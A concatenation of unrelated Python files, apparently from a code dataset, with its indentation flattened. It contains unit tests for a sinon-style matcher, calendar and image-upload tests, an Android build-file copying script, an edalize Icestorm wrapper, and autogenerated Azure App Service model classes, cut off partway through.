sys.path.insert(0, '../')
import unittest
import lib.base as sinon
from lib.matcher import SinonMatcher
from lib.spy import SinonSpy
from lib.stub import SinonStub
"""
======================================================
FOR TEST ONLY START
======================================================
"""
# build-in module
import os
# customized class
class A_object(object):
# class function
def A_func(self):
pass
# global function
def B_func():
pass
from TestClass import ForTestOnly
"""
======================================================
FOR TEST ONLY END
======================================================
"""
class TestSinonMatcher(unittest.TestCase):
def setUp(self):
sinon.g = sinon.init(globals())
def test001_constructor_number(self):
m = SinonMatcher(1)
self.assertTrue(m.mtest(1))
self.assertFalse(m.mtest(2))
def test002_constructor_strcmp_string(self):
m = SinonMatcher("match string", strcmp="default")
self.assertTrue(m.mtest("match"))
self.assertTrue(m.mtest("ch st"))
self.assertTrue(m.mtest("match string"))
self.assertFalse(m.mtest("match string++"))
self.assertFalse(m.mtest("match strig"))
def test003_constructor_strcmp_regex(self):
m = SinonMatcher(r"(\w*) (\w*)", strcmp="regex")
self.assertFalse(m.mtest("match"))
self.assertTrue(m.mtest("ch st"))
self.assertTrue(m.mtest("match string"))
self.assertTrue(m.mtest("match string++"))
self.assertTrue(m.mtest("match strig"))
def test004_constructor_func(self):
def custom_test_func(a, b, c):
return a+b+c
m = SinonMatcher(custom_test_func, is_custom_func=True)
self.assertEqual(m.mtest(1,2,3), 6)
m = SinonMatcher(r"(\w*) (\w*)", strcmp="regex")
self.assertFalse(m.mtest("match"))
def test005_constructor_func_invalid(self):
something = "Not Function"
with self.assertRaises(Exception) as context:
m = SinonMatcher(something, is_custom_func=True)
def test006_constructor_strcmp_invalid(self):
something = 123
with self.assertRaises(Exception) as context:
m = SinonMatcher(something, strcmp="default")
def test020_any(self):
m = SinonMatcher.any
self.assertTrue(m.mtest())
self.assertTrue(m.mtest(123))
self.assertTrue(m.mtest(self))
self.assertTrue(m.mtest("asd"))
def test021_defined(self):
m = SinonMatcher.defined
self.assertFalse(m.mtest())
self.assertFalse(m.mtest(None))
self.assertTrue(m.mtest([]))
self.assertTrue(m.mtest(['1']))
self.assertTrue(m.mtest(""))
self.assertTrue(m.mtest("1"))
def test022_truthy(self):
m = SinonMatcher.truthy
self.assertFalse(m.mtest())
self.assertTrue(m.mtest(True))
self.assertFalse(m.mtest(False))
self.assertFalse(m.mtest("asd"))
def test023_falsy(self):
m = SinonMatcher.falsy
self.assertFalse(m.mtest())
self.assertFalse(m.mtest(True))
self.assertTrue(m.mtest(False))
self.assertFalse(m.mtest("asd"))
def test024_bool(self):
m = SinonMatcher.bool
self.assertFalse(m.mtest())
self.assertTrue(m.mtest(True))
self.assertTrue(m.mtest(False))
self.assertFalse(m.mtest("asd"))
def test30_same(self):
m = SinonMatcher.same("100")
self.assertTrue(m.mtest("100"))
m = SinonMatcher.same(100)
self.assertTrue(m.mtest(100))
m = SinonMatcher.same(os.system)
self.assertTrue(m.mtest(os.system))
def test40_typeOf_class(self):
# This is a silly test, normal condition will not use this kinda cases.
fto = ForTestOnly()
m = SinonMatcher.typeOf(type)
self.assertTrue(m.mtest(ForTestOnly)) # class is a type
self.assertFalse(m.mtest(fto)) # instance is not a type
def test41_typeOf_instance(self):
fto = ForTestOnly()
m = SinonMatcher.typeOf(ForTestOnly)
self.assertFalse(m.mtest(ForTestOnly))
self.assertTrue(m.mtest(fto))
def test42_typeOf_value(self):
m = SinonMatcher.typeOf(int)
self.assertFalse(m.mtest("1")) # string is not a number
self.assertTrue(m.mtest(1)) # number is a number
def test43_typeOf_invalid_type(self):
with self.assertRaises(Exception) as context:
m = SinonMatcher.typeOf(123)
def test50_instanceOf_class(self):
fto = ForTestOnly()
with self.assertRaises(Exception) as context:
m = SinonMatcher.instanceOf(ForTestOnly)
def test51_instanceOf_instance(self):
spy = SinonSpy()
stub = SinonStub()
m = SinonMatcher.instanceOf(spy)
self.assertTrue(m.mtest(spy))
self.assertTrue(m.mtest(stub))
def test060_and_match(self):
spy = SinonSpy()
stub = SinonStub()
m = SinonMatcher.instanceOf(spy).and_match(SinonMatcher.instanceOf(stub))
self.assertFalse(m.mtest(spy))
self.assertTrue(m.mtest(stub))
def test061_or_match(self):
m = SinonMatcher.typeOf(int).or_match(SinonMatcher.typeOf(str))
self.assertTrue(m.mtest("1"))
self.assertTrue(m.mtest(1))
self.assertFalse(m.mtest())
self.assertFalse(m.mtest([1, "1"]))
| StarcoderdataPython |
351710 | """Test for event_manager.py."""
from datetime import datetime, timedelta, timezone
from googleapiclient.http import HttpMock
from showroomeventscheduler.google.calendar.event import Event
from showroomeventscheduler.google.calendar.event_manager import EventManager
class TestEventManager:
"""Test for EventManager."""
@staticmethod
def test_register(resource_path_root):
"""Smoke test."""
creds = None
calendar_id = "calendar_id"
http = HttpMock(filename=(resource_path_root / "event_insert_response.json"), headers={"status": "200"},)
event_manager = EventManager(creds, calendar_id, http=http)
event = Event(
"test",
datetime(2021, 7, 22, 23, 55, 0, 0, timezone(timedelta(hours=+9), "JST")),
datetime(2021, 7, 23, 0, 25, 0, 0, timezone(timedelta(hours=+9), "JST")),
)
event_manager.register(event)
@staticmethod
def test_check(resource_path_root):
creds = None
calendar_id = "calendar_id"
http = HttpMock(filename=(resource_path_root / "event_list_response.json"), headers={"status": "200"},)
event_manager = EventManager(creds, calendar_id, http=http)
event_manager.check()
@staticmethod
def test_check_empty(resource_path_root):
creds = None
calendar_id = "calendar_id"
http = HttpMock(filename=(resource_path_root / "event_list_response_empty.json"), headers={"status": "200"},)
event_manager = EventManager(creds, calendar_id, http=http)
event_manager.check()
| StarcoderdataPython |
4867375 | #!/usr/bin/env python2
import os
import shutil
DIR='build'
BUILD_ID_MK = '/'.join((DIR, 'core', 'build_id.mk'))
VERSION_MK = '/'.join((DIR, 'core', 'version_defaults.mk'))
def checkout(tag):
os.system('(cd %s; git checkout %s)'%(DIR, tag))
def get_level():
for line in open(VERSION_MK):
line = line.strip()
if not line.startswith('PLATFORM_SDK_VERSION'):
continue
version = line.split('=')[-1].strip()
return version
return '0'
def copy_build_files(level):
dest = '/'.join(('api-' + level, 'build', 'core'))
try: os.makedirs(dest)
except: pass
for f in (BUILD_ID_MK, VERSION_MK):
shutil.copy(f, dest)
for line in open('/'.join((DIR, 'tag'))):
tag = line.strip()
checkout(tag)
level = get_level()
print(level)
copy_build_files(level)
| StarcoderdataPython |
5146662 | <gh_stars>1-10
# Copyright edalize contributors
# Licensed under the 2-Clause BSD License, see LICENSE for details.
# SPDX-License-Identifier: BSD-2-Clause
import os.path
from edalize.edatool import Edatool
from edalize.nextpnr import Nextpnr
from edalize.yosys import Yosys
from edalize.flows.icestorm import Icestorm as Icestorm2
class Icestorm(Edatool):
argtypes = ["vlogdefine", "vlogparam"]
@classmethod
def get_doc(cls, api_ver):
if api_ver == 0:
options = {
"members": [
{
"name": "pnr",
"type": "String",
"desc": "Select Place & Route tool. Legal values are *arachne* for Arachne-PNR, *next* for nextpnr or *none* to only perform synthesis. Default is next",
},
],
"lists": [
{
"name": "arachne_pnr_options",
"type": "String",
"desc": "Additional options for Arachnhe PNR",
},
{
"name": "frontends",
"type": "String",
"desc": "fixme",
},
],
}
Edatool._extend_options(options, Yosys)
Edatool._extend_options(options, Nextpnr)
return {
"description": "Open source toolchain for Lattice iCE40 FPGAs. Uses yosys for synthesis and arachne-pnr or nextpnr for Place & Route",
"members": options["members"],
"lists": options["lists"],
}
def __init__(self, edam=None, work_root=None, eda_api=None, verbose=True):
super().__init__(edam, work_root, eda_api, verbose)
_tool_opts = edam["tool_options"]["icestorm"]
edam["flow_options"] = edam["tool_options"]["icestorm"]
self.icestorm = Icestorm2(edam, work_root, verbose)
def configure_main(self):
self.icestorm.configure()
def build_pre(self):
pass
def build_post(self):
pass
| StarcoderdataPython |
8098152 | <filename>tests/test_upload.py<gh_stars>0
import os
import requests
def test_upload_image():
test_dir = "./tests/test_img"
filename = "living-room.jpg"
file = {
"image": (os.path.basename(filename), open(os.path.join(test_dir, filename), 'rb'))
}
response = requests.post(url='http://localhost:5000', files=file)
assert response.status_code == 200
def test_invalid_file_extensions():
file = {
"image": ("dummy.txt", b"This is a fake", "rb")
}
response = requests.post(url='http://localhost:5000', files=file)
assert response.status_code == 422
# test cases
# gimme.bashrc.jpeg
# gimme.jpeg.bashrc
def test_hello():
response = requests.get(url='http://localhost:5000/hello')
assert response.content == b"Hello world!"
| StarcoderdataPython |
129553 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import msrest.serialization
class AddressResponse(msrest.serialization.Model):
"""Describes main public IP address and any extra virtual IPs.
:param service_ip_address: Main public virtual IP.
:type service_ip_address: str
:param internal_ip_address: Virtual Network internal IP address of the App Service Environment
if it is in internal load-balancing mode.
:type internal_ip_address: str
:param outbound_ip_addresses: IP addresses appearing on outbound connections.
:type outbound_ip_addresses: list[str]
:param vip_mappings: Additional virtual IPs.
:type vip_mappings: list[~azure.mgmt.web.v2016_09_01.models.VirtualIPMapping]
"""
_attribute_map = {
'service_ip_address': {'key': 'serviceIpAddress', 'type': 'str'},
'internal_ip_address': {'key': 'internalIpAddress', 'type': 'str'},
'outbound_ip_addresses': {'key': 'outboundIpAddresses', 'type': '[str]'},
'vip_mappings': {'key': 'vipMappings', 'type': '[VirtualIPMapping]'},
}
def __init__(
self,
**kwargs
):
super(AddressResponse, self).__init__(**kwargs)
self.service_ip_address = kwargs.get('service_ip_address', None)
self.internal_ip_address = kwargs.get('internal_ip_address', None)
self.outbound_ip_addresses = kwargs.get('outbound_ip_addresses', None)
self.vip_mappings = kwargs.get('vip_mappings', None)
class ApiDefinitionInfo(msrest.serialization.Model):
"""Information about the formal API definition for the app.
:param url: The URL of the API definition.
:type url: str
"""
_attribute_map = {
'url': {'key': 'url', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ApiDefinitionInfo, self).__init__(**kwargs)
self.url = kwargs.get('url', None)
class AppServiceEnvironmentCollection(msrest.serialization.Model):
"""Collection of App Service Environments.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.AppServiceEnvironmentResource]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[AppServiceEnvironmentResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(AppServiceEnvironmentCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class ProxyOnlyResource(msrest.serialization.Model):
"""Azure proxy only resource. This resource is not tracked by Azure Resource Manager.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ProxyOnlyResource, self).__init__(**kwargs)
self.id = None
self.name = None
self.kind = kwargs.get('kind', None)
self.type = None
class AppServiceEnvironmentPatchResource(ProxyOnlyResource):
"""ARM resource for a app service environment.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param name_properties_name: Name of the App Service Environment.
:type name_properties_name: str
:param location: Location of the App Service Environment, e.g. "West US".
:type location: str
:ivar provisioning_state: Provisioning state of the App Service Environment. Possible values
include: "Succeeded", "Failed", "Canceled", "InProgress", "Deleting".
:vartype provisioning_state: str or ~azure.mgmt.web.v2016_09_01.models.ProvisioningState
:ivar status: Current status of the App Service Environment. Possible values include:
"Preparing", "Ready", "Scaling", "Deleting".
:vartype status: str or ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentStatus
:param vnet_name: Name of the Virtual Network for the App Service Environment.
:type vnet_name: str
:param vnet_resource_group_name: Resource group of the Virtual Network.
:type vnet_resource_group_name: str
:param vnet_subnet_name: Subnet of the Virtual Network.
:type vnet_subnet_name: str
:param virtual_network: Description of the Virtual Network.
:type virtual_network: ~azure.mgmt.web.v2016_09_01.models.VirtualNetworkProfile
:param internal_load_balancing_mode: Specifies which endpoints to serve internally in the
Virtual Network for the App Service Environment. Possible values include: "None", "Web",
"Publishing".
:type internal_load_balancing_mode: str or
~azure.mgmt.web.v2016_09_01.models.InternalLoadBalancingMode
:param multi_size: Front-end VM size, e.g. "Medium", "Large".
:type multi_size: str
:param multi_role_count: Number of front-end instances.
:type multi_role_count: int
:param worker_pools: Description of worker pools with worker size IDs, VM sizes, and number of
workers in each pool.
:type worker_pools: list[~azure.mgmt.web.v2016_09_01.models.WorkerPool]
:param ipssl_address_count: Number of IP SSL addresses reserved for the App Service
Environment.
:type ipssl_address_count: int
:ivar database_edition: Edition of the metadata database for the App Service Environment, e.g.
"Standard".
:vartype database_edition: str
:ivar database_service_objective: Service objective of the metadata database for the App
Service Environment, e.g. "S0".
:vartype database_service_objective: str
:ivar upgrade_domains: Number of upgrade domains of the App Service Environment.
:vartype upgrade_domains: int
:ivar subscription_id: Subscription of the App Service Environment.
:vartype subscription_id: str
:param dns_suffix: DNS suffix of the App Service Environment.
:type dns_suffix: str
:ivar last_action: Last deployment action on the App Service Environment.
:vartype last_action: str
:ivar last_action_result: Result of the last deployment action on the App Service Environment.
:vartype last_action_result: str
:ivar allowed_multi_sizes: List of comma separated strings describing which VM sizes are
allowed for front-ends.
:vartype allowed_multi_sizes: str
:ivar allowed_worker_sizes: List of comma separated strings describing which VM sizes are
allowed for workers.
:vartype allowed_worker_sizes: str
:ivar maximum_number_of_machines: Maximum number of VMs in the App Service Environment.
:vartype maximum_number_of_machines: int
:ivar vip_mappings: Description of IP SSL mapping for the App Service Environment.
:vartype vip_mappings: list[~azure.mgmt.web.v2016_09_01.models.VirtualIPMapping]
:ivar environment_capacities: Current total, used, and available worker capacities.
:vartype environment_capacities: list[~azure.mgmt.web.v2016_09_01.models.StampCapacity]
:param network_access_control_list: Access control list for controlling traffic to the App
Service Environment.
:type network_access_control_list:
list[~azure.mgmt.web.v2016_09_01.models.NetworkAccessControlEntry]
:ivar environment_is_healthy: True/false indicating whether the App Service Environment is
healthy.
:vartype environment_is_healthy: bool
:ivar environment_status: Detailed message about with results of the last check of the App
Service Environment.
:vartype environment_status: str
:ivar resource_group: Resource group of the App Service Environment.
:vartype resource_group: str
:param front_end_scale_factor: Scale factor for front-ends.
:type front_end_scale_factor: int
:ivar default_front_end_scale_factor: Default Scale Factor for FrontEnds.
:vartype default_front_end_scale_factor: int
:param api_management_account_id: API Management Account associated with the App Service
Environment.
:type api_management_account_id: str
:param suspended: :code:`<code>true</code>` if the App Service Environment is suspended;
otherwise, :code:`<code>false</code>`. The environment can be suspended, e.g. when the
management endpoint is no longer available
(most likely because NSG blocked the incoming traffic).
:type suspended: bool
:param dynamic_cache_enabled: True/false indicating whether the App Service Environment is
suspended. The environment can be suspended e.g. when the management endpoint is no longer
available
(most likely because NSG blocked the incoming traffic).
:type dynamic_cache_enabled: bool
:param cluster_settings: Custom settings for changing the behavior of the App Service
Environment.
:type cluster_settings: list[~azure.mgmt.web.v2016_09_01.models.NameValuePair]
:param user_whitelisted_ip_ranges: User added ip ranges to whitelist on ASE db.
:type user_whitelisted_ip_ranges: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
'status': {'readonly': True},
'database_edition': {'readonly': True},
'database_service_objective': {'readonly': True},
'upgrade_domains': {'readonly': True},
'subscription_id': {'readonly': True},
'last_action': {'readonly': True},
'last_action_result': {'readonly': True},
'allowed_multi_sizes': {'readonly': True},
'allowed_worker_sizes': {'readonly': True},
'maximum_number_of_machines': {'readonly': True},
'vip_mappings': {'readonly': True},
'environment_capacities': {'readonly': True},
'environment_is_healthy': {'readonly': True},
'environment_status': {'readonly': True},
'resource_group': {'readonly': True},
'default_front_end_scale_factor': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name_properties_name': {'key': 'properties.name', 'type': 'str'},
'location': {'key': 'properties.location', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'status': {'key': 'properties.status', 'type': 'str'},
'vnet_name': {'key': 'properties.vnetName', 'type': 'str'},
'vnet_resource_group_name': {'key': 'properties.vnetResourceGroupName', 'type': 'str'},
'vnet_subnet_name': {'key': 'properties.vnetSubnetName', 'type': 'str'},
'virtual_network': {'key': 'properties.virtualNetwork', 'type': 'VirtualNetworkProfile'},
'internal_load_balancing_mode': {'key': 'properties.internalLoadBalancingMode', 'type': 'str'},
'multi_size': {'key': 'properties.multiSize', 'type': 'str'},
'multi_role_count': {'key': 'properties.multiRoleCount', 'type': 'int'},
'worker_pools': {'key': 'properties.workerPools', 'type': '[WorkerPool]'},
'ipssl_address_count': {'key': 'properties.ipsslAddressCount', 'type': 'int'},
'database_edition': {'key': 'properties.databaseEdition', 'type': 'str'},
'database_service_objective': {'key': 'properties.databaseServiceObjective', 'type': 'str'},
'upgrade_domains': {'key': 'properties.upgradeDomains', 'type': 'int'},
'subscription_id': {'key': 'properties.subscriptionId', 'type': 'str'},
'dns_suffix': {'key': 'properties.dnsSuffix', 'type': 'str'},
'last_action': {'key': 'properties.lastAction', 'type': 'str'},
'last_action_result': {'key': 'properties.lastActionResult', 'type': 'str'},
'allowed_multi_sizes': {'key': 'properties.allowedMultiSizes', 'type': 'str'},
'allowed_worker_sizes': {'key': 'properties.allowedWorkerSizes', 'type': 'str'},
'maximum_number_of_machines': {'key': 'properties.maximumNumberOfMachines', 'type': 'int'},
'vip_mappings': {'key': 'properties.vipMappings', 'type': '[VirtualIPMapping]'},
'environment_capacities': {'key': 'properties.environmentCapacities', 'type': '[StampCapacity]'},
'network_access_control_list': {'key': 'properties.networkAccessControlList', 'type': '[NetworkAccessControlEntry]'},
'environment_is_healthy': {'key': 'properties.environmentIsHealthy', 'type': 'bool'},
'environment_status': {'key': 'properties.environmentStatus', 'type': 'str'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'front_end_scale_factor': {'key': 'properties.frontEndScaleFactor', 'type': 'int'},
'default_front_end_scale_factor': {'key': 'properties.defaultFrontEndScaleFactor', 'type': 'int'},
'api_management_account_id': {'key': 'properties.apiManagementAccountId', 'type': 'str'},
'suspended': {'key': 'properties.suspended', 'type': 'bool'},
'dynamic_cache_enabled': {'key': 'properties.dynamicCacheEnabled', 'type': 'bool'},
'cluster_settings': {'key': 'properties.clusterSettings', 'type': '[NameValuePair]'},
'user_whitelisted_ip_ranges': {'key': 'properties.userWhitelistedIpRanges', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(AppServiceEnvironmentPatchResource, self).__init__(**kwargs)
self.name_properties_name = kwargs.get('name_properties_name', None)
self.location = kwargs.get('location', None)
self.provisioning_state = None
self.status = None
self.vnet_name = kwargs.get('vnet_name', None)
self.vnet_resource_group_name = kwargs.get('vnet_resource_group_name', None)
self.vnet_subnet_name = kwargs.get('vnet_subnet_name', None)
self.virtual_network = kwargs.get('virtual_network', None)
self.internal_load_balancing_mode = kwargs.get('internal_load_balancing_mode', None)
self.multi_size = kwargs.get('multi_size', None)
self.multi_role_count = kwargs.get('multi_role_count', None)
self.worker_pools = kwargs.get('worker_pools', None)
self.ipssl_address_count = kwargs.get('ipssl_address_count', None)
self.database_edition = None
self.database_service_objective = None
self.upgrade_domains = None
self.subscription_id = None
self.dns_suffix = kwargs.get('dns_suffix', None)
self.last_action = None
self.last_action_result = None
self.allowed_multi_sizes = None
self.allowed_worker_sizes = None
self.maximum_number_of_machines = None
self.vip_mappings = None
self.environment_capacities = None
self.network_access_control_list = kwargs.get('network_access_control_list', None)
self.environment_is_healthy = None
self.environment_status = None
self.resource_group = None
self.front_end_scale_factor = kwargs.get('front_end_scale_factor', None)
self.default_front_end_scale_factor = None
self.api_management_account_id = kwargs.get('api_management_account_id', None)
self.suspended = kwargs.get('suspended', None)
self.dynamic_cache_enabled = kwargs.get('dynamic_cache_enabled', None)
self.cluster_settings = kwargs.get('cluster_settings', None)
self.user_whitelisted_ip_ranges = kwargs.get('user_whitelisted_ip_ranges', None)
class Resource(msrest.serialization.Model):
"""Azure resource. This resource is tracked in Azure Resource Manager.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:param location: Required. Resource Location.
:type location: str
:ivar type: Resource type.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'location': {'required': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
super(Resource, self).__init__(**kwargs)
self.id = None
self.name = None
self.kind = kwargs.get('kind', None)
self.location = kwargs['location']
self.type = None
self.tags = kwargs.get('tags', None)
class AppServiceEnvironmentResource(Resource):
"""App Service Environment ARM resource.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:param location: Required. Resource Location.
:type location: str
:ivar type: Resource type.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param name_properties_name: Name of the App Service Environment.
:type name_properties_name: str
:param location_properties_location: Location of the App Service Environment, e.g. "West US".
:type location_properties_location: str
:ivar provisioning_state: Provisioning state of the App Service Environment. Possible values
include: "Succeeded", "Failed", "Canceled", "InProgress", "Deleting".
:vartype provisioning_state: str or ~azure.mgmt.web.v2016_09_01.models.ProvisioningState
:ivar status: Current status of the App Service Environment. Possible values include:
"Preparing", "Ready", "Scaling", "Deleting".
:vartype status: str or ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentStatus
:param vnet_name: Name of the Virtual Network for the App Service Environment.
:type vnet_name: str
:param vnet_resource_group_name: Resource group of the Virtual Network.
:type vnet_resource_group_name: str
:param vnet_subnet_name: Subnet of the Virtual Network.
:type vnet_subnet_name: str
:param virtual_network: Description of the Virtual Network.
:type virtual_network: ~azure.mgmt.web.v2016_09_01.models.VirtualNetworkProfile
:param internal_load_balancing_mode: Specifies which endpoints to serve internally in the
Virtual Network for the App Service Environment. Possible values include: "None", "Web",
"Publishing".
:type internal_load_balancing_mode: str or
~azure.mgmt.web.v2016_09_01.models.InternalLoadBalancingMode
:param multi_size: Front-end VM size, e.g. "Medium", "Large".
:type multi_size: str
:param multi_role_count: Number of front-end instances.
:type multi_role_count: int
:param worker_pools: Description of worker pools with worker size IDs, VM sizes, and number of
workers in each pool.
:type worker_pools: list[~azure.mgmt.web.v2016_09_01.models.WorkerPool]
:param ipssl_address_count: Number of IP SSL addresses reserved for the App Service
Environment.
:type ipssl_address_count: int
:ivar database_edition: Edition of the metadata database for the App Service Environment, e.g.
"Standard".
:vartype database_edition: str
:ivar database_service_objective: Service objective of the metadata database for the App
Service Environment, e.g. "S0".
:vartype database_service_objective: str
:ivar upgrade_domains: Number of upgrade domains of the App Service Environment.
:vartype upgrade_domains: int
:ivar subscription_id: Subscription of the App Service Environment.
:vartype subscription_id: str
:param dns_suffix: DNS suffix of the App Service Environment.
:type dns_suffix: str
:ivar last_action: Last deployment action on the App Service Environment.
:vartype last_action: str
:ivar last_action_result: Result of the last deployment action on the App Service Environment.
:vartype last_action_result: str
:ivar allowed_multi_sizes: List of comma separated strings describing which VM sizes are
allowed for front-ends.
:vartype allowed_multi_sizes: str
:ivar allowed_worker_sizes: List of comma separated strings describing which VM sizes are
allowed for workers.
:vartype allowed_worker_sizes: str
:ivar maximum_number_of_machines: Maximum number of VMs in the App Service Environment.
:vartype maximum_number_of_machines: int
:ivar vip_mappings: Description of IP SSL mapping for the App Service Environment.
:vartype vip_mappings: list[~azure.mgmt.web.v2016_09_01.models.VirtualIPMapping]
:ivar environment_capacities: Current total, used, and available worker capacities.
:vartype environment_capacities: list[~azure.mgmt.web.v2016_09_01.models.StampCapacity]
:param network_access_control_list: Access control list for controlling traffic to the App
Service Environment.
:type network_access_control_list:
list[~azure.mgmt.web.v2016_09_01.models.NetworkAccessControlEntry]
:ivar environment_is_healthy: True/false indicating whether the App Service Environment is
healthy.
:vartype environment_is_healthy: bool
:ivar environment_status: Detailed message about with results of the last check of the App
Service Environment.
:vartype environment_status: str
:ivar resource_group: Resource group of the App Service Environment.
:vartype resource_group: str
:param front_end_scale_factor: Scale factor for front-ends.
:type front_end_scale_factor: int
:ivar default_front_end_scale_factor: Default Scale Factor for FrontEnds.
:vartype default_front_end_scale_factor: int
:param api_management_account_id: API Management Account associated with the App Service
Environment.
:type api_management_account_id: str
:param suspended: :code:`<code>true</code>` if the App Service Environment is suspended;
otherwise, :code:`<code>false</code>`. The environment can be suspended, e.g. when the
management endpoint is no longer available
(most likely because NSG blocked the incoming traffic).
:type suspended: bool
:param dynamic_cache_enabled: True/false indicating whether the App Service Environment is
suspended. The environment can be suspended e.g. when the management endpoint is no longer
available
(most likely because NSG blocked the incoming traffic).
:type dynamic_cache_enabled: bool
:param cluster_settings: Custom settings for changing the behavior of the App Service
Environment.
:type cluster_settings: list[~azure.mgmt.web.v2016_09_01.models.NameValuePair]
:param user_whitelisted_ip_ranges: User added ip ranges to whitelist on ASE db.
:type user_whitelisted_ip_ranges: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'location': {'required': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
'status': {'readonly': True},
'database_edition': {'readonly': True},
'database_service_objective': {'readonly': True},
'upgrade_domains': {'readonly': True},
'subscription_id': {'readonly': True},
'last_action': {'readonly': True},
'last_action_result': {'readonly': True},
'allowed_multi_sizes': {'readonly': True},
'allowed_worker_sizes': {'readonly': True},
'maximum_number_of_machines': {'readonly': True},
'vip_mappings': {'readonly': True},
'environment_capacities': {'readonly': True},
'environment_is_healthy': {'readonly': True},
'environment_status': {'readonly': True},
'resource_group': {'readonly': True},
'default_front_end_scale_factor': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'name_properties_name': {'key': 'properties.name', 'type': 'str'},
'location_properties_location': {'key': 'properties.location', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'status': {'key': 'properties.status', 'type': 'str'},
'vnet_name': {'key': 'properties.vnetName', 'type': 'str'},
'vnet_resource_group_name': {'key': 'properties.vnetResourceGroupName', 'type': 'str'},
'vnet_subnet_name': {'key': 'properties.vnetSubnetName', 'type': 'str'},
'virtual_network': {'key': 'properties.virtualNetwork', 'type': 'VirtualNetworkProfile'},
'internal_load_balancing_mode': {'key': 'properties.internalLoadBalancingMode', 'type': 'str'},
'multi_size': {'key': 'properties.multiSize', 'type': 'str'},
'multi_role_count': {'key': 'properties.multiRoleCount', 'type': 'int'},
'worker_pools': {'key': 'properties.workerPools', 'type': '[WorkerPool]'},
'ipssl_address_count': {'key': 'properties.ipsslAddressCount', 'type': 'int'},
'database_edition': {'key': 'properties.databaseEdition', 'type': 'str'},
'database_service_objective': {'key': 'properties.databaseServiceObjective', 'type': 'str'},
'upgrade_domains': {'key': 'properties.upgradeDomains', 'type': 'int'},
'subscription_id': {'key': 'properties.subscriptionId', 'type': 'str'},
'dns_suffix': {'key': 'properties.dnsSuffix', 'type': 'str'},
'last_action': {'key': 'properties.lastAction', 'type': 'str'},
'last_action_result': {'key': 'properties.lastActionResult', 'type': 'str'},
'allowed_multi_sizes': {'key': 'properties.allowedMultiSizes', 'type': 'str'},
'allowed_worker_sizes': {'key': 'properties.allowedWorkerSizes', 'type': 'str'},
'maximum_number_of_machines': {'key': 'properties.maximumNumberOfMachines', 'type': 'int'},
'vip_mappings': {'key': 'properties.vipMappings', 'type': '[VirtualIPMapping]'},
'environment_capacities': {'key': 'properties.environmentCapacities', 'type': '[StampCapacity]'},
'network_access_control_list': {'key': 'properties.networkAccessControlList', 'type': '[NetworkAccessControlEntry]'},
'environment_is_healthy': {'key': 'properties.environmentIsHealthy', 'type': 'bool'},
'environment_status': {'key': 'properties.environmentStatus', 'type': 'str'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'front_end_scale_factor': {'key': 'properties.frontEndScaleFactor', 'type': 'int'},
'default_front_end_scale_factor': {'key': 'properties.defaultFrontEndScaleFactor', 'type': 'int'},
'api_management_account_id': {'key': 'properties.apiManagementAccountId', 'type': 'str'},
